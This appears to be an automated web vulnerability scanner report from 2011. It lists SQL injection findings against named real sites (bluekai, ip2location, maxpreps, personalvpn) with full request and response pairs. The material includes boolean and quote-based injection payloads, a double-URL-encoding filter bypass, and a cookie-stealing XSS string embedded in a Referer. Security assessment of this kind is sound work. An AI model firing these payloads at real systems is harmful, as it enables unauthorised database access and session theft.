Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:04:41 GMT
Content-Length: 15024

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"504465",rotatorId:"15989",creativeSizeId:"207",isBlank:"0",seg_pageState:"2312;BC2312-51",adHTML:"<div id=\"madison_ad_2
...[SNIP]...
og.com.com/adlog/c/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e10:4DB7E2E96462F&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.41/http://clk.atdmt.com/COM/go/305845692/direct;pc.504465/01/2011.04.27.22.04.41\" target=\"_blank\"><img src=\"http://adlog.com.com/adlog/i/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e10:4DB7E2E96462F&orh=cbssports.com&ort=&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&dvar=dvar%255fexclude%253dgolf%2523dvar%255finstlang%253den%252dUS%2523dvar%255fsession%253dc%2523dvar%255fsubsession%253d4%2523dvar%255fuser%253danon&ucat_rsi=%2526&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.41/http://i.i.com.com/cnwk.1d/Ads/2312/10/SWA_0_Redtape_970x66_jpg.jpg\" height=\"66\" width=\"970\" alt=\"Click Here\" border=\"0\" /></a><img src=\"http://view.atdmt.com/COM/view/305845692/direct;pc.504465/01/2011.04.27.22.04.41\" width=\"0\" height=\"0\" border=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" /></center></div></div>"})/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw3.cnet.com::1754036544 2011.04.27.22.04.41 *//* MAC T 0.1.4.5 */;/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad110_100",segmentId:"503380",rotatorId:"18229",creativeSizeId:"79",isBlank:"0",seg_pageState:"",adHTML:"<style type=\"text/css\"> @import \"http://i.i.com.com/cnwk.1d/Ads/common/css/SportsSkyOne/SportsSkyOne.css\";</style>\n<ul class=\"adsSportsSkyOne\">\n <li id=\"item_1_503380\" style=\"display:block;\">\n <a class=\"adsSportsSkyOne_img\" href=\"http://adlog.com.com/adlog/c/r=18229&sg=503380&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=
...[SNIP]...

1.14. http://tags.bluekai.com/site/3344 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tags.bluekai.com
Path:	/site/3344

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /site/3344'%20and%201%3d1--%20?ret=js&phint=site%3D175&phint=ncat%3D22072%3A22408%3A&phint=ptype%3D2001&phint=__bk_t%3DTennis%20-%20CBSSports.com%20Scoreboard%2C%20Schedules%2C%20Players&phint=__bk_k%3Dworld%20womens%20wta%20mens%20atp%20tennis%20news%2C%20professional%20wta%20atp%20tennis%20tour%20players%20wimbledon%20french%20open%20u.s.%20open%20australian%20davis%20fed%20cup%20open%20rankings%2C%20CBSSports%20Line&jscb=cbsiPrepBK&data=all&r=52828613 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bklc=4db80c19; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bko=KJhE8VPQ0mqjTzF/A9CAjROjA2QQnsRs9aH4OSy=; bkw5=KJhqoLc9yYOPyL9aocQjfrAp1e90zc/5Z1f9zWXq/zwe11zx/zmrM8eCRc96xzQDVQsamWLRFMYYh1n+xKx68QIVe9p+eQy1SH/keYA1/nsUeCYjo69j91NIWd6=; bk=oQUj+e49Zw3VIHOf; bkc=KJh56v2nxNWRhFcFlKjIKm29LOZVNsRyEcuYRwKv+iki1QQZ0T/QEWH71vi/RkoSWC6TTjoWaFywOJBBn/RPZHqhFO4w5+2qprceK5fpy+ByGjHNtw/K495GsWdcFJSi8TLAfJHQ1InmMwjfpv5Etizh0ddV7DWTpMiLH8pXx77JNjj8bfR8ZiBxMwQtjLkqU8F8PQLVSA6dHUkDwcrQnU7guCotP0WpcwQjMC9Fr+3u+pTlqt7Ejf5ycITEE60inc7gR99KPbeI4Kz7u/uVdbmVFwPnckbFcJbejMQFd+ksV4nVOKw0ZWmhNF47m1oCwddm8reB2naXtw5KHqLSLXhq+6NdUCFmwZ8b77mNJVI51lbbNBfRN8bFSL++744Q5XCHf3SNGdFI9JN3kfA=; bkst=KJy5MgNvhW9DCVIh/sCuVx3nCVNQ4rd1kcsBbyGChmiViC1ZY/aLWjv/ntYdI9ot0MSYakRVFGcwRsaMjIFL+r5X4mK1Tc6qR9rboZTVxl1EFvDMIweH9jEz1R7YHDoqsT7v0zQuioahNZZ7iDeYk2dw7FdNdY8yHH9BT6JJvgkWnLlkHFKy9f9wJL2F0dB15i5L536mS2awYNRRfvoLtCjcAfdhitz4wqLcApQoA7uKAbxqpoJENUjUSmmInRXU2DRjOr+aooMQsQANMYA+Aas2dc702EQWYse/7OlimlcHpl+8Fdn8PfCIGCYkkD/u0iovYnsZvik3vbyov0pB8IL3dx5GsWZQ; bkdc=res

Response 1

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 22:05:34 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=Dc5GyAUFTeZVIHOf; expires=Mon, 24-Oct-2011 22:05:34 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56ENn96WxOrOlAlCJF9LztaZAikR3YWR6QoevhCw+GGiPCVOkA6/x/3JHLw9nw0GH+O/211JjiPpCwhYLf/vBHH3JBrnmTUQlNIp0Lmd1yv059dGraxRmchyayBSKrJ9IcjJra3EnmhYKETVI1GauHZcjYM6u1IUjh6kQ+xxLH5ySkVfsFeXLFHzp2VKlmGc5+1JYh1kwYWIq6kEw2FUC5Qwais2MoMpfV+zlsLOAlUPu3OE/R8Fuks5UeVO+eAClKDTSt0OwZ5vDjhdoB6wFL8tdeISHIyzCEcZtNyWXpQn7Ul5m9G79Ne230gB42cII7iAXKt8xEd8KQEektU7+uG2YLHfbGh4YyUfI71AYqlG41NrCNbFu+jio7rlgdPAIzwOIXI2hD8g0fvpt6T76TGj6rujBBp+79EItWZTq6+a8FdHcoXy=; expires=Mon, 24-Oct-2011 22:05:34 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0E8VBQ6JrXy8KJxjVUQusqjTzF/61iAJDOjANiQfYRsxYRxxK4; expires=Mon, 24-Oct-2011 22:05:34 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJhqoLc9yYOPyL9aocQjfrAp1e90zc/5Z1f9zWXq/zwe11zx/zmrM8eCRc96xzQDVQsamWLRFMYYh1n+xKx68QIVe9hi5A9jCCvsW6YuszxW0QMypMOCjOYl98AYAuksDLVWG3g5QRWCESvW/xDL2+/ORFJEG1A9/X9SfQ==; expires=Mon, 24-Oct-2011 22:05:34 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Thu, 28-Apr-2011 22:05:34 GMT; path=/; domain=.bluekai.com
BK-Server: 8d9f
Content-Length: 337
Content-Type: text/javascript
Connection: keep-alive

cbsiPrepBK(
{
"campaigns": [
{
"campaign": 15987,
"timestamp": 1303941934,
"categories": [
{
"categoryID": 79000,
"timestamp": 1303941934
}
]
},
{
"campaign": 15894,
"timestamp": 1303941934,
"categories": [
{
"categoryID": 79000,
"timestamp": 1303941934
}
]
}
]
}
);

Request 2

GET /site/3344'%20and%201%3d2--%20?ret=js&phint=site%3D175&phint=ncat%3D22072%3A22408%3A&phint=ptype%3D2001&phint=__bk_t%3DTennis%20-%20CBSSports.com%20Scoreboard%2C%20Schedules%2C%20Players&phint=__bk_k%3Dworld%20womens%20wta%20mens%20atp%20tennis%20news%2C%20professional%20wta%20atp%20tennis%20tour%20players%20wimbledon%20french%20open%20u.s.%20open%20australian%20davis%20fed%20cup%20open%20rankings%2C%20CBSSports%20Line&jscb=cbsiPrepBK&data=all&r=52828613 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bklc=4db80c19; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bko=KJhE8VPQ0mqjTzF/A9CAjROjA2QQnsRs9aH4OSy=; bkw5=KJhqoLc9yYOPyL9aocQjfrAp1e90zc/5Z1f9zWXq/zwe11zx/zmrM8eCRc96xzQDVQsamWLRFMYYh1n+xKx68QIVe9p+eQy1SH/keYA1/nsUeCYjo69j91NIWd6=; bk=oQUj+e49Zw3VIHOf; bkc=KJh56v2nxNWRhFcFlKjIKm29LOZVNsRyEcuYRwKv+iki1QQZ0T/QEWH71vi/RkoSWC6TTjoWaFywOJBBn/RPZHqhFO4w5+2qprceK5fpy+ByGjHNtw/K495GsWdcFJSi8TLAfJHQ1InmMwjfpv5Etizh0ddV7DWTpMiLH8pXx77JNjj8bfR8ZiBxMwQtjLkqU8F8PQLVSA6dHUkDwcrQnU7guCotP0WpcwQjMC9Fr+3u+pTlqt7Ejf5ycITEE60inc7gR99KPbeI4Kz7u/uVdbmVFwPnckbFcJbejMQFd+ksV4nVOKw0ZWmhNF47m1oCwddm8reB2naXtw5KHqLSLXhq+6NdUCFmwZ8b77mNJVI51lbbNBfRN8bFSL++744Q5XCHf3SNGdFI9JN3kfA=; bkst=KJy5MgNvhW9DCVIh/sCuVx3nCVNQ4rd1kcsBbyGChmiViC1ZY/aLWjv/ntYdI9ot0MSYakRVFGcwRsaMjIFL+r5X4mK1Tc6qR9rboZTVxl1EFvDMIweH9jEz1R7YHDoqsT7v0zQuioahNZZ7iDeYk2dw7FdNdY8yHH9BT6JJvgkWnLlkHFKy9f9wJL2F0dB15i5L536mS2awYNRRfvoLtCjcAfdhitz4wqLcApQoA7uKAbxqpoJENUjUSmmInRXU2DRjOr+aooMQsQANMYA+Aas2dc702EQWYse/7OlimlcHpl+8Fdn8PfCIGCYkkD/u0iovYnsZvik3vbyov0pB8IL3dx5GsWZQ; bkdc=res

Response 2

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 22:05:35 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=OqkFexxreVtVIHOf; expires=Mon, 24-Oct-2011 22:05:35 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56ENn96WxOrOlAlCJF9LztaZAikSvYWR6QoevhCw+GGiPCVOkA6/x/3JHLw9nw0GH+O/211JjiPpCwhYLf/vBHH3JBrnmTUQlNIp0Lmd1yv059dGraxRmchyayBSKrJ9IcjJra3EnmhYKETVI1GauHZcjYM6u1IUjh6kQ+xxLH5ySkVfsFeXLFHzp2VKlmGc5+1JYh1kwYWIq6kEw2FUC5Qwais2MoMpfV+zlsLOAlUPu3OE/R8Fuks5UeVO+eAClKDTSt0OwZ5vDjhdoB6wFL8tdeISHIyzCEcZtNyWXpQn7Ul5m9G79Ne230gB42cII7iAXKt8xEd8KQEektU7+uG2YLHfbGh4YyUfI71AYqlG41NrCNbFu+jio7rlgdPAIzwOIXI2hD8g0fvpt6T76TGj6rujBBp+79EItWZTq6+a8Fy5to2/=; expires=Mon, 24-Oct-2011 22:05:35 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0E8VBQ6JIXy8KjxjVUQusqjTzF/61iAJDOjANiQfYRsxYRCxKC; expires=Mon, 24-Oct-2011 22:05:35 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJhqoLc9yYOPyL9aocQjfrAp1e90zc/5Z1f9zWXq/zwe11zx/zmrM8eCRc96xzQDVQsamWLRFMYYh1n+xKx68QIVe9hi5A9jCCvsW6YuYzxW0QMypMOCjOOcAZss0fQFjsxGHoJCx5cEfLe9AYjHyo9Ya7Fo9nc7v59K9sjNsdW=; expires=Mon, 24-Oct-2011 22:05:35 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Thu, 28-Apr-2011 22:05:35 GMT; path=/; domain=.bluekai.com
BK-Server: f349
Content-Length: 488
Content-Type: text/javascript
Connection: keep-alive

cbsiPrepBK(
{
"campaigns": [
{
"campaign": 15895,
"timestamp": 1303941935,
"categories": [
{
"categoryID": 106823,
"timestamp": 1303941935
}
]
},
{
"campaign": 15987,
"timestamp": 1303941935,
"categories": [
{
"categoryID": 79000,
"timestamp": 1303941935
}
]
},
{
"campaign": 15894,
"timestamp": 1303941935,
"categories": [
{
"categoryID": 79000,
"timestamp": 1303941935
}
]
}
]
}
);

1.15. http://tools.ip2location.com/ib2 [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tools.ip2location.com
Path:	/ib2

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ib2 HTTP/1.1
Host: tools.ip2location.com
Proxy-Connection: keep-alive
Referer: http://www.witopia.net/index.php/products/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1709
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Wed, 27 Apr 2011 21:14:10 GMT

<html>
<head>
<title>IP2Location Information Box 2</title>
<meta content="IP2Location™ Free Product Demo, Free Webmaster Tools, Sample Databases and Web Services for Programmers, Webmasters a
...[SNIP]...
</html>
ERROR [42000] [MySQL][ODBC 5.1 Driver][mysqld-5.1.31-community-log]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like' at line 1

Request 2

GET /ib2 HTTP/1.1
Host: tools.ip2location.com
Proxy-Connection: keep-alive
Referer: http://www.witopia.net/index.php/products/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1416
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Wed, 27 Apr 2011 21:14:12 GMT

<html>
<head>
<title>IP2Location Information Box 2</title>
<meta content="IP2Location™ Free Product Demo, Free Webmaster Tools, Sample Databases and Web Services for Programmers, Webmasters a
...[SNIP]...

1.16. http://www.maxpreps.com/WebResource.axd [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.maxpreps.com
Path:	/WebResource.axd

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /WebResource.axd?d=3j-F7gVcFfLOJ9mrf8UaCw2&t=633525117006718750&1%2527=1 HTTP/1.1
Host: www.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/videoview.aspx?videoid=aed2aa1c-c7d4-470d-b99d-97053686306adb8a3%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4d8cac70fcc&cb=14460
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265

Response 1

HTTP/1.1 503 Service Unavailable
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Thu, 28 Apr 2011 18:50:42 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 28 Apr 2011 18:50:42 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 26416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" >

...[SNIP]...
<form name="aspnetForm" method="post" action="utility/errorhandler/invalidinformation.aspx" id="aspnetForm">
...[SNIP]...
d keep the form on the screen
responseElement.innerHTML = result.get_responseData().toString();
_gaq.push(['_trackEvent', 'ErrorPage', 'Fail']);
}
}
}
}
}
}

//Sends the email to the tech support
function sen
...[SNIP]...

Request 2

GET /WebResource.axd?d=3j-F7gVcFfLOJ9mrf8UaCw2&t=633525117006718750&1%2527%2527=1 HTTP/1.1
Host: www.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/videoview.aspx?videoid=aed2aa1c-c7d4-470d-b99d-97053686306adb8a3%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4d8cac70fcc&cb=14460
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Thu, 24 Jul 2008 22:55:00 GMT
Content-Type: application/x-javascript
Content-Length: 20931
Expires: Thu, 28 Apr 2011 18:50:42 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 28 Apr 2011 18:50:42 GMT
Connection: close

function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {
this.eventTarget = eventTarget;
this.eventArgument = eventArg
...[SNIP]...

1.17. http://www.personalvpn.com/index.php [sid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.personalvpn.com
Path:	/index.php

Issue detail

The sid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the sid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.php?app=ccp0&ns=viewcart&sid=4345a8cg600y1ar42khfi9pf954r17xh' HTTP/1.1
Host: www.personalvpn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 10:15:23 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/1.0.0d PHP/5.2.13 with Suhosin-Patch
X-Powered-By: KHXC/6.6.5
Set-Cookie: sid=4345a8cg600y1ar42khfi9pf954r17xh%27; expires=Sun, 22-Apr-2012 06:15:23 GMT; path=/; domain=.witopia.net
Pragma: no-cache
Cache-Control: must-revalidate
Expires: Thu, 28 Apr 2011 09:15:23 GMT
Content-Length: 3880
Last-Modified: Thu, 28 Apr 2011 10:15:23 GMT
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="content-ty
...[SNIP]...
<p>The PostgreSQL extension encountered
a problem submitting an SQL statement. PostgreSQL reported the error as: ERROR: duplicate key value violates unique constraint "pk_khxc_sessions_id"</
...[SNIP]...

1.18. http://www.personalvpn.com/index.php [sid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.personalvpn.com
Path:	/index.php

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /index.php HTTP/1.1
Host: www.personalvpn.com
Proxy-Connection: keep-alive
Referer: http://www.personalvpn.com/index.php?app=ccp0&ns=prodshow&ref=pptp_ssl_pc
Cache-Control: max-age=0
Origin: http://www.personalvpn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 233

prodall%5B%5D=pptp_ssl_pc&ccp0--prodaddtocart--pptp_ssl_pc--referref=pptp_ssl_pc&ccp0--prodaddtocart--pptp_ssl_pc--referns=prodshow&sid=60x0b62eys7w6x6uj2b6m04894n169fn'&app=ccp0&ns=addcart&ccp0--prodaddtocart--pptp_ssl_pc--quantity=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:16:01 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/1.0.0d PHP/5.2.13 with Suhosin-Patch
X-Powered-By: KHXC/6.6.5
Set-Cookie: sid=60x0b62eys7w6x6uj2b6m04894n169fn%27; expires=Sat, 21-Apr-2012 17:16:01 GMT; path=/; domain=.witopia.net
Pragma: no-cache
Cache-Control: must-revalidate
Expires: Wed, 27 Apr 2011 20:16:02 GMT
Content-Length: 3880
Last-Modified: Wed, 27 Apr 2011 21:16:02 GMT
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="content-ty
...[SNIP]...
<p>The PostgreSQL extension encountered
a problem submitting an SQL statement. PostgreSQL reported the error as: ERROR: duplicate key value violates unique constraint "pk_khxc_sessions_id"</
...[SNIP]...

1.19. https://www.personalvpn.com/index.php [sid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.personalvpn.com
Path:	/index.php

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /index.php?app=ccp0&ns=checkout&sid=60x0b62eys7w6x6uj2b6m04894n169fn'&portrelay=1 HTTP/1.1
Host: www.personalvpn.com
Connection: keep-alive
Referer: http://www.personalvpn.com/index.php
Cache-Control: max-age=0
Origin: http://www.personalvpn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 17

CHECKOUT=Checkout

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:16:19 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/1.0.0d PHP/5.2.13 with Suhosin-Patch
X-Powered-By: KHXC/6.6.5
Set-Cookie: sid=60x0b62eys7w6x6uj2b6m04894n169fn%27; expires=Sat, 21-Apr-2012 17:16:19 GMT; path=/; domain=.witopia.net
Pragma: no-cache
Cache-Control: must-revalidate
Expires: Wed, 27 Apr 2011 20:16:19 GMT
Content-Length: 3881
Last-Modified: Wed, 27 Apr 2011 21:16:19 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="content-ty
...[SNIP]...
<p>The PostgreSQL extension encountered
a problem submitting an SQL statement. PostgreSQL reported the error as: ERROR: duplicate key value violates unique constraint "pk_khxc_sessions_id"</
...[SNIP]...

2. HTTP header injection previous next
There are 13 instances of this issue:

http://ad.doubleclick.net/dot.gif [REST URL parameter 1]
http://amch.questionmarket.com/adsc/d674921/2/717103/decide.php [XCLGFbrowser parameter]
http://amch.questionmarket.com/adsc/d674921/2/717103/decide.php [name of an arbitrarily supplied request parameter]
http://amch.questionmarket.com/adsc/d884653/4/500005059184/decide.php [ES cookie]
http://amch.questionmarket.com/adscgen/sta.php [code parameter]
http://amch.questionmarket.com/adscgen/sta.php [site parameter]
http://d.xp1.ru4.com/activity [redirect parameter]
http://dw.com.com/clear/c.gif [REST URL parameter 2]
http://dw.com.com/clear/redx/c.gif [REST URL parameter 2]
http://dw.com.com/clear/redx/c.gif [REST URL parameter 3]
http://tacoda.at.atwola.com/rtx/r.js [N cookie]
